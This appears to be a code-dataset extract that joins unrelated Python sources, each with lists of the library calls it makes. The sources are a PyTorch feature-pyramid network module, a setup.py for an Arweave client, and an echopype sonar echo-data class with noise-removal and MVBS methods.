'"""deployments_api"""'}), "('^deployments/api/$', 'deployments_api', name='deployments_api')\n", (637, 702), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((709, 806), 'django.conf.urls.defaults.url', 'url', (['"""^deployments/(?P<domain>[\\\\w\\\\.-]+)/info/$"""', '"""deployment_info"""'], {'name': '"""deployment_info"""'}), "('^deployments/(?P<domain>[\\\\w\\\\.-]+)/info/$', 'deployment_info', name=\n 'deployment_info')\n", (712, 806), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((807, 896), 'django.conf.urls.defaults.url', 'url', (['"""^(?P<domain>[\\\\w\\\\.-]+)/approve/$"""', '"""approve_app"""'], {'name': '"""approve_appstore_app"""'}), "('^(?P<domain>[\\\\w\\\\.-]+)/approve/$', 'approve_app', name=\n 'approve_appstore_app')\n", (810, 896), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((896, 984), 'django.conf.urls.defaults.url', 'url', (['"""^(?P<domain>[\\\\w\\\\.-]+)/copy/$"""', '"""copy_snapshot"""'], {'name': '"""domain_copy_snapshot"""'}), "('^(?P<domain>[\\\\w\\\\.-]+)/copy/$', 'copy_snapshot', name=\n 'domain_copy_snapshot')\n", (899, 984), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((984, 1078), 'django.conf.urls.defaults.url', 'url', (['"""^(?P<domain>[\\\\w\\\\.-]+)/importapp/$"""', '"""import_app"""'], {'name': '"""import_app_from_snapshot"""'}), "('^(?P<domain>[\\\\w\\\\.-]+)/importapp/$', 'import_app', name=\n 'import_app_from_snapshot')\n", (987, 1078), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((1078, 1169), 'django.conf.urls.defaults.url', 'url', (['"""^(?P<domain>[\\\\w\\\\.-]+)/image/$"""', '"""project_image"""'], {'name': '"""appstore_project_image"""'}), "('^(?P<domain>[\\\\w\\\\.-]+)/image/$', 
'project_image', name=\n 'appstore_project_image')\n", (1081, 1169), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((1169, 1247), 'django.conf.urls.defaults.url', 'url', (['"""^(?P<domain>[\\\\w\\\\.-]+)/multimedia/$"""', '"""media_files"""'], {'name': '"""media_files"""'}), "('^(?P<domain>[\\\\w\\\\.-]+)/multimedia/$', 'media_files', name='media_files')\n", (1172, 1247), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((464, 483), 'django.conf.urls.defaults.include', 'include', (['store_urls'], {}), '(store_urls)\n', (471, 483), False, 'from django.conf.urls.defaults import url, include, patterns\n')] |
from __future__ import absolute_import
import torch
from torch.nn import functional
class FPN(torch.nn.Module):
def __init__(self, out_channels):
super(FPN, self).__init__()
self.out_channels = out_channels
self.P5 = torch.nn.MaxPool2d(kernel_size=1, stride=2, padding=0)
self.P4_conv1 = torch.nn.Conv2d(512, self.out_channels, kernel_size=1, stride=1, padding=0)
self.P4_conv2 = torch.nn.Conv2d(self.out_channels, self.out_channels, 3, 1, 1)
self.P3_conv1 = torch.nn.Conv2d(512, self.out_channels, kernel_size=1, stride=1, padding=0)
self.P3_conv2 = torch.nn.Conv2d(self.out_channels, self.out_channels, 3, 1, 1)
self.P2_conv1 = torch.nn.Conv2d(256, self.out_channels, kernel_size=1, stride=1, padding=0)
self.P2_conv2 = torch.nn.Conv2d(self.out_channels, self.out_channels, 3, 1, 1)
normal_init(self.P4_conv1, 0, 0.01)
normal_init(self.P4_conv2, 0, 0.01)
normal_init(self.P3_conv1, 0, 0.01)
normal_init(self.P3_conv2, 0, 0.01)
normal_init(self.P2_conv1, 0, 0.01)
normal_init(self.P2_conv2, 0, 0.01)
def forward(self, C2, C3, C4):
p4_out = self.P4_conv1(C4)
p5_out = self.P5(p4_out)
p3_out = self._upsample_add(p4_out, self.P3_conv1(C3))
p2_out = self._upsample_add(p3_out, self.P2_conv1(C2))
p4_out = self.P4_conv2(p4_out)
p3_out = self.P3_conv2(p3_out)
p2_out = self.P2_conv2(p2_out)
return p2_out, p3_out, p4_out, p5_out
def _upsample_add(self, x, y):
'''Upsample and add two feature maps.
Args:
x: (Variable) top feature map to be upsampled.
y: (Variable) lateral feature map.
Returns:
(Variable) added feature map.
Note in PyTorch, when input size is odd, the upsampled feature map
with `F.upsample(..., scale_factor=2, mode='nearest')`
        may not be equal to the lateral feature map size.
e.g.
original input size: [N,_,15,15] ->
conv2d feature map size: [N,_,8,8] ->
upsampled feature map size: [N,_,16,16]
So we choose bilinear upsample which supports arbitrary output sizes.
'''
_,_,H,W = y.size()
return functional.interpolate(x, size=(H,W), mode='bilinear') + y
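# Illustrative usage sketch (shapes are assumptions, not from the original file):
# the lateral 1x1 convolutions above expect C2 with 256 channels and C3/C4 with
# 512 channels, e.g.
#   fpn = FPN(out_channels=256)
#   p2, p3, p4, p5 = fpn(torch.randn(1, 256, 64, 64),   # C2
#                        torch.randn(1, 512, 32, 32),   # C3
#                        torch.randn(1, 512, 16, 16))   # C4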
def normal_init(m, mean, stddev, truncated=False):
"""
    weight initializer: truncated normal and random normal.
"""
# x is a parameter
if truncated:
m.weight.data.normal_().fmod_(2).mul_(stddev).add_(mean) # not a perfect approximation
else:
m.weight.data.normal_(mean, stddev)
m.bias.data.zero_() | [
"torch.nn.MaxPool2d",
"torch.nn.functional.interpolate",
"torch.nn.Conv2d"
]
| [((247, 301), 'torch.nn.MaxPool2d', 'torch.nn.MaxPool2d', ([], {'kernel_size': '(1)', 'stride': '(2)', 'padding': '(0)'}), '(kernel_size=1, stride=2, padding=0)\n', (265, 301), False, 'import torch\n'), ((327, 402), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['(512)', 'self.out_channels'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(512, self.out_channels, kernel_size=1, stride=1, padding=0)\n', (342, 402), False, 'import torch\n'), ((427, 489), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['self.out_channels', 'self.out_channels', '(3)', '(1)', '(1)'], {}), '(self.out_channels, self.out_channels, 3, 1, 1)\n', (442, 489), False, 'import torch\n'), ((515, 590), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['(512)', 'self.out_channels'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(512, self.out_channels, kernel_size=1, stride=1, padding=0)\n', (530, 590), False, 'import torch\n'), ((615, 677), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['self.out_channels', 'self.out_channels', '(3)', '(1)', '(1)'], {}), '(self.out_channels, self.out_channels, 3, 1, 1)\n', (630, 677), False, 'import torch\n'), ((703, 778), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['(256)', 'self.out_channels'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(256, self.out_channels, kernel_size=1, stride=1, padding=0)\n', (718, 778), False, 'import torch\n'), ((803, 865), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['self.out_channels', 'self.out_channels', '(3)', '(1)', '(1)'], {}), '(self.out_channels, self.out_channels, 3, 1, 1)\n', (818, 865), False, 'import torch\n'), ((2263, 2318), 'torch.nn.functional.interpolate', 'functional.interpolate', (['x'], {'size': '(H, W)', 'mode': '"""bilinear"""'}), "(x, size=(H, W), mode='bilinear')\n", (2285, 2318), False, 'from torch.nn import functional\n')] |
from distutils.core import setup
setup(
name="arweave-python-client",
packages = ['arweave'], # this must be the same as the name above
version="1.0.15.dev0",
description="Client interface for sending transactions on the Arweave permaweb",
author="<NAME>",
author_email="<EMAIL>",
url="https://github.com/MikeHibbert/arweave-python-client",
download_url="https://github.com/MikeHibbert/arweave-python-client",
keywords=['arweave', 'crypto'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=[
'arrow',
'python-jose',
'pynacl',
'pycryptodome',
'cryptography',
'requests',
'psutil'
],
)
| [
"distutils.core.setup"
]
| [((34, 687), 'distutils.core.setup', 'setup', ([], {'name': '"""arweave-python-client"""', 'packages': "['arweave']", 'version': '"""1.0.15.dev0"""', 'description': '"""Client interface for sending transactions on the Arweave permaweb"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'url': '"""https://github.com/MikeHibbert/arweave-python-client"""', 'download_url': '"""https://github.com/MikeHibbert/arweave-python-client"""', 'keywords': "['arweave', 'crypto']", 'classifiers': "['Programming Language :: Python :: 3',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent']", 'install_requires': "['arrow', 'python-jose', 'pynacl', 'pycryptodome', 'cryptography',\n 'requests', 'psutil']"}), "(name='arweave-python-client', packages=['arweave'], version=\n '1.0.15.dev0', description=\n 'Client interface for sending transactions on the Arweave permaweb',\n author='<NAME>', author_email='<EMAIL>', url=\n 'https://github.com/MikeHibbert/arweave-python-client', download_url=\n 'https://github.com/MikeHibbert/arweave-python-client', keywords=[\n 'arweave', 'crypto'], classifiers=[\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent'], install_requires=['arrow',\n 'python-jose', 'pynacl', 'pycryptodome', 'cryptography', 'requests',\n 'psutil'])\n", (39, 687), False, 'from distutils.core import setup\n')] |
"""
echopype data model that keeps track of echo data and
its connection to data files.
"""
import os
import warnings
import datetime as dt
from echopype.utils import uwa
import numpy as np
import xarray as xr
class ModelBase(object):
"""Class for manipulating echo data that is already converted to netCDF."""
def __init__(self, file_path=""):
self.file_path = file_path # this passes the input through file name test
self.noise_est_range_bin_size = 5 # meters per tile for noise estimation
self.noise_est_ping_size = 30 # number of pings per tile for noise estimation
self.MVBS_range_bin_size = 5 # meters per tile for MVBS
self.MVBS_ping_size = 30 # number of pings per tile for MVBS
self.Sv = None # calibrated volume backscattering strength
self.Sv_path = None # path to save calibrated results
self.Sv_clean = None # denoised volume backscattering strength
self.TS = None # calibrated target strength
self.TS_path = None # path to save TS calculation results
self.MVBS = None # mean volume backscattering strength
self._salinity = None
self._temperature = None
self._pressure = None
self._sound_speed = None
self._sample_thickness = None
self._range = None
self._seawater_absorption = None
@property
def salinity(self):
return self._salinity
@salinity.setter
def salinity(self, sal):
self._salinity = sal
@property
def pressure(self):
return self._pressure
@pressure.setter
def pressure(self, pres):
self._pressure = pres
@property
def temperature(self):
return self._temperature
@temperature.setter
def temperature(self, t):
self._temperature = t
@property
def sample_thickness(self):
return self._sample_thickness
@sample_thickness.setter
def sample_thickness(self, sth):
self._sample_thickness = sth
@property
def range(self):
return self._range
@range.setter
def range(self, rr):
self._range = rr
@property
def seawater_absorption(self):
return self._seawater_absorption
@seawater_absorption.setter
def seawater_absorption(self, absorption):
self._seawater_absorption.values = absorption
@property
def sound_speed(self):
return self._sound_speed
@sound_speed.setter
def sound_speed(self, ss):
if isinstance(self._sound_speed, xr.DataArray):
self._sound_speed.values = ss
else:
self._sound_speed = ss
@property
def file_path(self):
return self._file_path
@file_path.setter
def file_path(self, p):
self._file_path = p
# Load netCDF groups if file format is correct
pp = os.path.basename(p)
_, ext = os.path.splitext(pp)
supported_ext_list = ['.raw', '.01A']
if ext in supported_ext_list:
print('Data file in manufacturer format, please convert to .nc first.')
elif ext == '.nc':
self.toplevel = xr.open_dataset(self.file_path)
# Get .nc filenames for storing processed data if computation is performed
self.Sv_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_Sv.nc')
self.Sv_clean_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_Sv_clean.nc')
self.TS_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_TS.nc')
self.MVBS_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_MVBS.nc')
# Raise error if the file format convention does not match
if self.toplevel.sonar_convention_name != 'SONAR-netCDF4':
raise ValueError('netCDF file convention not recognized.')
self.toplevel.close()
else:
raise ValueError('Data file format not recognized.')
def calc_sound_speed(self, src='file'):
"""Base method to be overridden for calculating sound_speed for different sonar models
"""
# issue warning when subclass methods not available
print("Sound speed calculation has not been implemented for this sonar model!")
def calc_seawater_absorption(self, src='file'):
"""Base method to be overridden for calculating seawater_absorption for different sonar models
"""
# issue warning when subclass methods not available
print("Seawater absorption calculation has not been implemented for this sonar model!")
def calc_sample_thickness(self):
"""Base method to be overridden for calculating sample_thickness for different sonar models.
"""
# issue warning when subclass methods not available
print('Sample thickness calculation has not been implemented for this sonar model!')
def calc_range(self):
"""Base method to be overridden for calculating range for different sonar models.
"""
# issue warning when subclass methods not available
print('Range calculation has not been implemented for this sonar model!')
def recalculate_environment(self, ss=True, sa=True, st=True, r=True):
""" Recalculates sound speed, seawater absorption, sample thickness, and range using
salinity, temperature, and pressure
Parameters
----------
ss : bool
            Whether to calculate sound speed. Defaults to `True`
        sa : bool
            Whether to calculate seawater absorption. Defaults to `True`
        st : bool
            Whether to calculate sample thickness. Defaults to `True`
        r : bool
            Whether to calculate range. Defaults to `True`
"""
s, t, p = self.salinity, self.temperature, self.pressure
if s is not None and t is not None and p is not None:
if ss:
self.sound_speed = self.calc_sound_speed(src='user')
if sa:
self.seawater_absorption = self.calc_seawater_absorption(src='user')
if st:
self.sample_thickness = self.calc_sample_thickness()
if r:
self.range = self.calc_range()
elif s is None:
print("Salinity was not provided. Environment was not recalculated")
elif t is None:
print("Temperature was not provided. Environment was not recalculated")
else:
print("Pressure was not provided. Environment was not recalculated")
def calibrate(self):
"""Base method to be overridden for volume backscatter calibration and echo-integration for different sonar models.
"""
# issue warning when subclass methods not available
print('Calibration has not been implemented for this sonar model!')
def calibrate_TS(self):
"""Base method to be overridden for target strength calibration and echo-integration for different sonar models.
"""
# issue warning when subclass methods not available
print('Target strength calibration has not been implemented for this sonar model!')
def validate_path(self, save_path, save_postfix):
"""Creates a directory if it doesnt exist. Returns a valid save path.
"""
def _assemble_path():
file_in = os.path.basename(self.file_path)
file_name, file_ext = os.path.splitext(file_in)
return file_name + save_postfix + file_ext
if save_path is None:
save_dir = os.path.dirname(self.file_path)
file_out = _assemble_path()
else:
path_ext = os.path.splitext(save_path)[1]
# If given save_path is file, split into directory and file
if path_ext != '':
save_dir, file_out = os.path.split(save_path)
if save_dir == '': # save_path is only a filename without directory
save_dir = os.path.dirname(self.file_path) # use directory from input file
# If given save_path is a directory, get a filename from input .nc file
else:
save_dir = save_path
file_out = _assemble_path()
# Create folder if not already exists
if save_dir == '':
# TODO: should we use '.' instead of os.getcwd()?
save_dir = os.getcwd() # explicit about path to current directory
if not os.path.exists(save_dir):
os.mkdir(save_dir)
return os.path.join(save_dir, file_out)
@staticmethod
def get_tile_params(r_data_sz, p_data_sz, r_tile_sz, p_tile_sz, sample_thickness):
"""Obtain ping_time and range_bin parameters associated with groupby and groupby_bins operations.
These parameters are used in methods remove_noise(), noise_estimates(), get_MVBS().
Parameters
----------
r_data_sz : int
number of range_bin entries in data
p_data_sz : int
number of ping_time entries in data
r_tile_sz : float
tile size along the range_bin dimension [m]
p_tile_sz : int
tile size along the ping_time dimension [number of pings]
sample_thickness : float
thickness of each data sample, determined by sound speed and pulse duration
Returns
-------
        r_tile_sz : float
modified tile size along the range dimension [m], determined by sample_thickness
r_tile_bin_edge : list of int
bin edges along the range_bin dimension for :py:func:`xarray.DataArray.groupby_bins` operation
p_tile_bin_edge : list of int
bin edges along the ping_time dimension for :py:func:`xarray.DataArray.groupby_bins` operation
"""
# Adjust noise_est_range_bin_size because range_bin_size may be an inconvenient value
num_r_per_tile = np.round(r_tile_sz / sample_thickness).astype(int) # num of range_bin per tile
r_tile_sz = num_r_per_tile * sample_thickness
# Total number of range_bin and ping tiles
num_tile_range_bin = np.ceil(r_data_sz / num_r_per_tile).astype(int)
if np.mod(p_data_sz, p_tile_sz) == 0:
num_tile_ping = np.ceil(p_data_sz / p_tile_sz).astype(int) + 1
else:
num_tile_ping = np.ceil(p_data_sz / p_tile_sz).astype(int)
# Tile bin edges along range
# ... -1 to make sure each bin has the same size because of the right-inclusive and left-exclusive bins
r_tile_bin_edge = [np.arange(x.values + 1) * y.values - 1 for x, y in zip(num_tile_range_bin, num_r_per_tile)]
p_tile_bin_edge = np.arange(num_tile_ping + 1) * p_tile_sz - 1
return r_tile_sz, r_tile_bin_edge, p_tile_bin_edge
def _get_proc_Sv(self, source_path=None, source_postfix='_Sv'):
"""Private method to return calibrated Sv either from memory or _Sv.nc file.
This method is called by remove_noise(), noise_estimates() and get_MVBS().
"""
if self.Sv is None: # calibration not yet performed
Sv_path = self.validate_path(save_path=source_path, # wrangle _Sv path
save_postfix=source_postfix)
if os.path.exists(Sv_path): # _Sv exists
self.Sv = xr.open_dataset(Sv_path) # load _Sv file
else:
# if path specification given but file do not exist:
if (source_path is not None) or (source_postfix != '_Sv'):
print('%s no calibrated data found in specified path: %s' %
(dt.datetime.now().strftime('%H:%M:%S'), Sv_path))
else:
print('%s data has not been calibrated. ' % dt.datetime.now().strftime('%H:%M:%S'))
print(' performing calibration now and operate from Sv in memory.')
self.calibrate() # calibrate, have Sv in memory
return self.Sv
def remove_noise(self, source_postfix='_Sv', source_path=None,
noise_est_range_bin_size=None, noise_est_ping_size=None,
SNR=0, Sv_threshold=None,
save=False, save_postfix='_Sv_clean', save_path=None):
"""Remove noise by using noise estimates obtained from the minimum mean calibrated power level
along each column of tiles.
See method noise_estimates() for details of noise estimation.
Reference: <NAME> & Higginbottom, 2017, ICES Journal of Marine Sciences
Parameters
----------
source_postfix : str
postfix of the Sv file used to remove noise from, default to '_Sv'
source_path : str
path of Sv file used to remove noise from, can be one of the following:
- None (default):
use Sv in RAWFILENAME_Sv.nc in the same folder as the raw data file,
or when RAWFILENAME_Sv.nc doesn't exist, perform self.calibrate() and use the resulted self.Sv
- path to a directory: RAWFILENAME_Sv.nc in the specified directory
- path to a specific file: the specified file, e.g., ./another_directory/some_other_filename.nc
noise_est_range_bin_size : float, optional
Meters per tile for noise estimation [m]
noise_est_ping_size : int, optional
Number of pings per tile for noise estimation
SNR : int, optional
Minimum signal-to-noise ratio (remove values below this after general noise removal).
Sv_threshold : int, optional
Minimum Sv threshold [dB] (remove values below this after general noise removal)
save : bool, optional
Whether to save the denoised Sv (``Sv_clean``) into a new .nc file.
Default to ``False``.
save_postfix : str
Filename postfix, default to '_Sv_clean'
save_path : str
Full filename to save to, overwriting the RAWFILENAME_Sv_clean.nc default
"""
# Check params
if (noise_est_range_bin_size is not None) and (self.noise_est_range_bin_size != noise_est_range_bin_size):
self.noise_est_range_bin_size = noise_est_range_bin_size
if (noise_est_ping_size is not None) and (self.noise_est_ping_size != noise_est_ping_size):
self.noise_est_ping_size = noise_est_ping_size
# Get calibrated Sv
if self.Sv is not None:
print('%s Remove noise from Sv stored in memory.' % dt.datetime.now().strftime('%H:%M:%S'))
print_src = False
else:
print_src = True
proc_data = self._get_proc_Sv(source_path=source_path, source_postfix=source_postfix)
if print_src:
print('%s Remove noise from Sv stored in: %s' %
(dt.datetime.now().strftime('%H:%M:%S'), self.Sv_path))
# Get tile indexing parameters
self.noise_est_range_bin_size, range_bin_tile_bin_edge, ping_tile_bin_edge = \
self.get_tile_params(r_data_sz=proc_data.range_bin.size,
p_data_sz=proc_data.ping_time.size,
r_tile_sz=self.noise_est_range_bin_size,
p_tile_sz=self.noise_est_ping_size,
sample_thickness=self.sample_thickness)
# Get TVG and ABS for compensating for transmission loss
range_meter = self.range
TVG = np.real(20 * np.log10(range_meter.where(range_meter >= 1, other=1)))
ABS = 2 * self.seawater_absorption * range_meter
# Function for use with apply
def remove_n(x, rr):
p_c_lin = 10 ** ((x.Sv - x.ABS - x.TVG) / 10)
nn = 10 * np.log10(p_c_lin.mean(dim='ping_time').groupby_bins('range_bin', rr).mean().min(
dim='range_bin_bins')) + x.ABS + x.TVG
# Return values where signal is [SNR] dB above noise and at least [Sv_threshold] dB
if not Sv_threshold:
return x.Sv.where(x.Sv > (nn + SNR), other=np.nan)
else:
return x.Sv.where((x.Sv > (nn + SNR)) & (x > Sv_threshold), other=np.nan)
# Groupby noise removal operation
proc_data.coords['ping_idx'] = ('ping_time', np.arange(proc_data.Sv['ping_time'].size))
ABS.name = 'ABS'
TVG.name = 'TVG'
pp = xr.merge([proc_data, ABS])
pp = xr.merge([pp, TVG])
# check if number of range_bin per tile the same for all freq channels
if np.unique([np.array(x).size for x in range_bin_tile_bin_edge]).size == 1:
Sv_clean = pp.groupby_bins('ping_idx', ping_tile_bin_edge).\
map(remove_n, rr=range_bin_tile_bin_edge[0])
Sv_clean = Sv_clean.drop_vars(['ping_idx'])
else:
tmp_clean = []
cnt = 0
for key, val in pp.groupby('frequency'): # iterate over different frequency channel
tmp = val.groupby_bins('ping_idx', ping_tile_bin_edge). \
map(remove_n, rr=range_bin_tile_bin_edge[cnt])
cnt += 1
tmp_clean.append(tmp)
clean_val = np.array([zz.values for zz in xr.align(*tmp_clean, join='outer')])
Sv_clean = xr.DataArray(clean_val,
coords={'frequency': proc_data['frequency'].values,
'ping_time': tmp_clean[0]['ping_time'].values,
'range_bin': tmp_clean[0]['range_bin'].values},
dims=['frequency', 'ping_time', 'range_bin'])
# Set up DataSet
Sv_clean.name = 'Sv'
Sv_clean = Sv_clean.to_dataset()
Sv_clean['noise_est_range_bin_size'] = ('frequency', self.noise_est_range_bin_size)
Sv_clean.attrs['noise_est_ping_size'] = self.noise_est_ping_size
# Attach calculated range into data set
Sv_clean['range'] = (('frequency', 'range_bin'), self.range.T)
# Save as object attributes as a netCDF file
self.Sv_clean = Sv_clean
# TODO: now adding the below so that MVBS can be calculated directly
# from the cleaned Sv without saving and loading Sv_clean from disk.
# However this is not explicit to the user. A better way to do this
# is to change get_MVBS() to first check existence of self.Sv_clean
# when `_Sv_clean` is specified as the source_postfix.
if not print_src: # remove noise from Sv stored in memory
self.Sv = Sv_clean.copy()
if save:
self.Sv_clean_path = self.validate_path(save_path=save_path, save_postfix=save_postfix)
print('%s saving denoised Sv to %s' % (dt.datetime.now().strftime('%H:%M:%S'), self.Sv_clean_path))
Sv_clean.to_netcdf(self.Sv_clean_path)
# Close opened resources
proc_data.close()
def noise_estimates(self, source_postfix='_Sv', source_path=None,
noise_est_range_bin_size=None, noise_est_ping_size=None):
"""Obtain noise estimates from the minimum mean calibrated power level along each column of tiles.
The tiles here are defined by class attributes noise_est_range_bin_size and noise_est_ping_size.
This method contains redundant pieces of code that also appear in method remove_noise(),
but this method can be used separately to determine the exact tile size for noise removal before
noise removal is actually performed.
Parameters
----------
source_postfix : str
postfix of the Sv file used to calculate noise estimates from, default to '_Sv'
source_path : str
path of Sv file used to calculate noise estimates from, can be one of the following:
- None (default):
use Sv in RAWFILENAME_Sv.nc in the same folder as the raw data file,
or when RAWFILENAME_Sv.nc doesn't exist, perform self.calibrate() and use the resulted self.Sv
- path to a directory: RAWFILENAME_Sv.nc in the specified directory
- path to a specific file: the specified file, e.g., ./another_directory/some_other_filename.nc
noise_est_range_bin_size : float
meters per tile for noise estimation [m]
noise_est_ping_size : int
number of pings per tile for noise estimation
Returns
-------
noise_est : xarray DataSet
noise estimates as a DataArray with dimension [ping_time x range_bin]
ping_time and range_bin are taken from the first element of each tile along each of the dimensions
"""
# Check params
if (noise_est_range_bin_size is not None) and (self.noise_est_range_bin_size != noise_est_range_bin_size):
self.noise_est_range_bin_size = noise_est_range_bin_size
if (noise_est_ping_size is not None) and (self.noise_est_ping_size != noise_est_ping_size):
self.noise_est_ping_size = noise_est_ping_size
# Use calibrated data to calculate noise removal
proc_data = self._get_proc_Sv()
# Get tile indexing parameters
self.noise_est_range_bin_size, range_bin_tile_bin_edge, ping_tile_bin_edge = \
self.get_tile_params(r_data_sz=proc_data.range_bin.size,
p_data_sz=proc_data.ping_time.size,
r_tile_sz=self.noise_est_range_bin_size,
p_tile_sz=self.noise_est_ping_size,
sample_thickness=self.sample_thickness)
# Values for noise estimates
range_meter = self.range
TVG = np.real(20 * np.log10(range_meter.where(range_meter >= 1, other=1)))
ABS = 2 * self.seawater_absorption * range_meter
# Noise estimates
proc_data['power_cal'] = 10 ** ((proc_data.Sv - ABS - TVG) / 10)
# check if number of range_bin per tile the same for all freq channels
if np.unique([np.array(x).size for x in range_bin_tile_bin_edge]).size == 1:
noise_est = 10 * np.log10(proc_data['power_cal'].coarsen(
ping_time=self.noise_est_ping_size,
range_bin=int(np.unique(self.noise_est_range_bin_size / self.sample_thickness)),
boundary='pad').mean().min(dim='range_bin'))
else:
range_bin_coarsen_idx = (self.noise_est_range_bin_size / self.sample_thickness).astype(int)
tmp_noise = []
for r_bin in range_bin_coarsen_idx:
freq = r_bin.frequency.values
tmp_da = 10 * np.log10(proc_data['power_cal'].sel(frequency=freq).coarsen(
ping_time=self.noise_est_ping_size,
range_bin=r_bin.values,
boundary='pad').mean().min(dim='range_bin'))
tmp_da.name = 'noise_est'
tmp_noise.append(tmp_da)
# Construct a dataArray TODO: this can probably be done smarter using xarray native functions
noise_val = np.array([zz.values for zz in xr.align(*tmp_noise, join='outer')])
noise_est = xr.DataArray(noise_val,
coords={'frequency': proc_data['frequency'].values,
'ping_time': tmp_noise[0]['ping_time'].values},
dims=['frequency', 'ping_time'])
noise_est = noise_est.to_dataset(name='noise_est')
noise_est['noise_est_range_bin_size'] = ('frequency', self.noise_est_range_bin_size)
noise_est.attrs['noise_est_ping_size'] = self.noise_est_ping_size
# Close opened resources
proc_data.close()
return noise_est
def get_MVBS(self, source_postfix='_Sv', source_path=None,
MVBS_range_bin_size=None, MVBS_ping_size=None,
save=False, save_postfix='_MVBS', save_path=None):
"""Calculate Mean Volume Backscattering Strength (MVBS).
The calculation uses class attributes MVBS_ping_size and MVBS_range_bin_size to
calculate and save MVBS as a new attribute to the calling EchoData instance.
MVBS is an xarray DataArray with dimensions ``ping_time`` and ``range_bin``
that are from the first elements of each tile along the corresponding dimensions
in the original Sv or Sv_clean DataArray.
Parameters
----------
source_postfix : str
postfix of the Sv file used to calculate MVBS, default to '_Sv'
source_path : str
path of Sv file used to calculate MVBS, can be one of the following:
- None (default):
use Sv in RAWFILENAME_Sv.nc in the same folder as the raw data file,
or when RAWFILENAME_Sv.nc doesn't exist, perform self.calibrate() and use the resulted self.Sv
- path to a directory: RAWFILENAME_Sv.nc in the specified directory
- path to a specific file: the specified file, e.g., ./another_directory/some_other_filename.nc
MVBS_range_bin_size : float, optional
meters per tile for calculating MVBS [m]
MVBS_ping_size : int, optional
number of pings per tile for calculating MVBS
save : bool, optional
whether to save the calculated MVBS into a new .nc file, default to ``False``
save_postfix : str
Filename postfix, default to '_MVBS'
save_path : str
Full filename to save to, overwriting the RAWFILENAME_MVBS.nc default
"""
# Check params
if (MVBS_range_bin_size is not None) and (self.MVBS_range_bin_size != MVBS_range_bin_size):
self.MVBS_range_bin_size = MVBS_range_bin_size
if (MVBS_ping_size is not None) and (self.MVBS_ping_size != MVBS_ping_size):
self.MVBS_ping_size = MVBS_ping_size
# Get Sv by validating path and calibrate if not already done
if self.Sv is not None:
print('%s use Sv stored in memory to calculate MVBS' % dt.datetime.now().strftime('%H:%M:%S'))
print_src = False
else:
print_src = True
proc_data = self._get_proc_Sv(source_path=source_path, source_postfix=source_postfix)
if print_src:
if self.Sv_path is not None:
print('%s Sv source used to calculate MVBS: %s' %
(dt.datetime.now().strftime('%H:%M:%S'), self.Sv_path))
else:
print('%s Sv source used to calculate MVBS: memory' %
dt.datetime.now().strftime('%H:%M:%S'))
# Get tile indexing parameters
self.MVBS_range_bin_size, range_bin_tile_bin_edge, ping_tile_bin_edge = \
self.get_tile_params(r_data_sz=proc_data.range_bin.size,
p_data_sz=proc_data.ping_time.size,
r_tile_sz=self.MVBS_range_bin_size,
p_tile_sz=self.MVBS_ping_size,
sample_thickness=self.sample_thickness)
# Calculate MVBS
Sv_linear = 10 ** (proc_data.Sv / 10) # convert to linear domain before averaging
# check if number of range_bin per tile the same for all freq channels
if np.unique([np.array(x).size for x in range_bin_tile_bin_edge]).size == 1:
MVBS = 10 * np.log10(Sv_linear.coarsen(
ping_time=self.MVBS_ping_size,
range_bin=int(np.unique(self.MVBS_range_bin_size / self.sample_thickness)),
boundary='pad').mean())
MVBS.coords['range_bin'] = ('range_bin', np.arange(MVBS['range_bin'].size))
else:
range_bin_coarsen_idx = (self.MVBS_range_bin_size / self.sample_thickness).astype(int)
tmp_MVBS = []
for r_bin in range_bin_coarsen_idx:
freq = r_bin.frequency.values
tmp_da = 10 * np.log10(Sv_linear.sel(frequency=freq).coarsen(
ping_time=self.MVBS_ping_size,
range_bin=r_bin.values,
boundary='pad').mean())
tmp_da.coords['range_bin'] = ('range_bin', np.arange(tmp_da['range_bin'].size))
tmp_da.name = 'MVBS'
tmp_MVBS.append(tmp_da)
# Construct a dataArray TODO: this can probably be done smarter using xarray native functions
MVBS_val = np.array([zz.values for zz in xr.align(*tmp_MVBS, join='outer')])
MVBS = xr.DataArray(MVBS_val,
coords={'frequency': Sv_linear['frequency'].values,
'ping_time': tmp_MVBS[0]['ping_time'].values,
'range_bin': np.arange(MVBS_val.shape[2])},
dims=['frequency', 'ping_time', 'range_bin']).dropna(dim='range_bin', how='all')
# Set MVBS attributes
MVBS.name = 'MVBS'
MVBS = MVBS.to_dataset()
MVBS['MVBS_range_bin_size'] = ('frequency', self.MVBS_range_bin_size)
MVBS.attrs['MVBS_ping_size'] = self.MVBS_ping_size
# Save results in object and as a netCDF file
self.MVBS = MVBS
if save:
self.MVBS_path = self.validate_path(save_path=save_path, save_postfix=save_postfix)
print('%s saving MVBS to %s' % (dt.datetime.now().strftime('%H:%M:%S'), self.MVBS_path))
MVBS.to_netcdf(self.MVBS_path)
# Close opened resources
proc_data.close()
| [
"numpy.array",
"xarray.align",
"numpy.mod",
"numpy.arange",
"os.path.exists",
